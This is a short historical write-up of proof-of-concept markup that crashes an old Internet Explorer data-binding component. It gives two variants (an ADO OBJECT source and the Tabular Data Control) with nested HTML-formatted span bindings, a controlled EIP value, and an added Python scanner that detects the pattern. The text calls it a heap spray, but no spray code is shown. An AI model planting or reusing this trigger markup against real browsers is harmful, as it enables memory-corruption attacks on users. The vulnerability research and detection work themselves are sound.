These are two variations of a heap spray technique, exploring different data-binding sources in place of the original XML island. Both bind an iframe's src through the datasrc/datafld mechanism with HTML formatting enabled (dataformatas="html"); the original crash address was 438242f8, CALL ECX+84.

ADO Object Variation

<OBJECT ID="i" DATA="data.html" HEIGHT=0 WIDTH=0></OBJECT>

<span datasrc="#i" datafld="c" dataformatas="html">
<span datasrc="#i" datafld="c" dataformatas="html">

The data.html file contains:

<span id="c"><iframe src="http://www.google.com/"></span>

Tabular Data Control Variation

<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83" ID=i WIDTH=500 HEIGHT=500>
<PARAM NAME=DataURL VALUE="data.csv">
<PARAM NAME=UseHeader VALUE="True">
<PARAM NAME=FieldDelim VALUE=,>
<PARAM NAME=EscapeChar VALUE=\>
<PARAM name=AppendData VALUE=true>
</OBJECT>

<span datasrc="#i" datafld="c" dataformatas="html">
<span datasrc="#i" datafld="c" dataformatas="html">

Both variations replace the original XML island with different data sources while keeping the same binding technique intact. The target EIP was C085FFFE — a recognizable indicator of a controlled-address jump.
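As an added example (not code from the original post), a small defensive scanner built on Python's standard-library HTML parser that flags the binding pattern both variations share: a data-bound element with dataformatas="html", resolved to the OBJECT that feeds it (an OBJECT with a DATA attribute, or the Tabular Data Control identified by its CLSID). The sample markup is constructed from the fragments above; the bound data files are not needed to detect the pattern.

```python
from html.parser import HTMLParser

# CLSID of the Tabular Data Control, as used in the page's second variation.
TDC_CLSID = "clsid:333c7bc4-460f-11d0-bc04-0080c7055a83"


class DataBindingScanner(HTMLParser):
    """Records <OBJECT> data sources and every element that binds a field with dataformatas=html."""

    def __init__(self):
        super().__init__()
        self.sources = {}    # OBJECT id -> kind of data source it provides
        self.bindings = []   # (tag, datasrc id, datafld) for HTML-formatted bindings

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; bare attributes arrive as None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and "id" in a:
            if a.get("classid", "").lower() == TDC_CLSID:
                self.sources[a["id"]] = "tabular-data-control"
            elif "data" in a:
                self.sources[a["id"]] = "object-data:" + a["data"]
        if "datasrc" in a and "datafld" in a and a.get("dataformatas", "").lower() == "html":
            self.bindings.append((tag, a["datasrc"].lstrip("#"), a["datafld"]))


def scan(html):
    """Return one finding per HTML-formatted data binding, resolved to its OBJECT source."""
    p = DataBindingScanner()
    p.feed(html)
    p.close()
    return [
        {"element": tag, "datasrc": src, "datafld": fld, "source": p.sources.get(src, "unknown")}
        for tag, src, fld in p.bindings
    ]


# Constructed samples mirroring the page's two variations.
ADO_SAMPLE = """<OBJECT ID="i" DATA="data.html" HEIGHT=0 WIDTH=0></OBJECT>
<span datasrc="#i" datafld="c" dataformatas="html">
<span datasrc="#i" datafld="c" dataformatas="html">"""

TDC_SAMPLE = """<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83" ID=i WIDTH=500 HEIGHT=500>
<PARAM NAME=DataURL VALUE="data.csv"><PARAM NAME=UseHeader VALUE="True">
</OBJECT>
<span datasrc="#i" datafld="c" dataformatas="html">"""

# A binding rendered as plain text is not flagged: the bound field cannot introduce markup.
BENIGN_SAMPLE = '<OBJECT ID="i" DATA="data.html"></OBJECT><span datasrc="#i" datafld="c" dataformatas="text">'

if __name__ == "__main__":
    for name, sample in (("ADO", ADO_SAMPLE), ("TDC", TDC_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(name, scan(sample))
```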

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.